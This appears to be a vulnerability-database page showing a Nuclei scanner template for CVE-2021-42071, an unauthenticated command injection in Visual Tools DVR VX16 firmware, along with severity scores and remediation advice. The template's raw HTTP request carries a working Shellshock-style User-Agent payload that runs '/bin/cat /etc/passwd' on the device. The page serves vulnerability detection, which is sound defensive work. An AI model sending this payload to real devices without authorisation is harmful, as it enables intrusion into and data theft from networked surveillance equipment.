Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-42071
HistoryJul 22, 2021 - 11:47 p.m.

Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection

2021-07-2223:47:29
ProjectDiscovery
github.com
7
cve-2021-42071
command injection
visual tools
remote code execution
confidentiality
integrity
availability

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.961

Percentile

99.5%

Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.

id: CVE-2021-42071

info:
  name: Visual Tools DVR VX16 4.2.28.0 - Unauthenticated OS Command Injection
  author: gy741
  severity: critical
  description: Visual Tools DVR VX16 4.2.28.0 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
  remediation: |
    Apply the latest security patch or update provided by the vendor to fix the command injection vulnerability in the Visual Tools DVR VX16 4.2.28.0 device.
  reference:
    - https://www.exploit-db.com/exploits/50098
    - https://nvd.nist.gov/vuln/detail/CVE-2021-42071
    - https://visual-tools.com/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-42071
    cwe-id: CWE-78
    epss-score: 0.95674
    epss-percentile: 0.99369
    cpe: cpe:2.3:o:visual-tools:dvr_vx16_firmware:4.2.28.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: visual-tools
    product: dvr_vx16_firmware
  tags: cve2021,cve,edb,visualtools,rce,oast,injection,visual-tools

http:
  - raw:
      - |
        GET /cgi-bin/slogin/login.py HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022022bda7091e3540a34b2b907492621caf6c888488e538235ee18aff6324b08e5c022100e8f540a98d8d4a968c5aaef78722d234f0b39007f3ad5f349108f6eee417bd8f:922c64590222798bb761d5b6d8e72950

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.8

Confidence

High

EPSS

0.961

Percentile

99.5%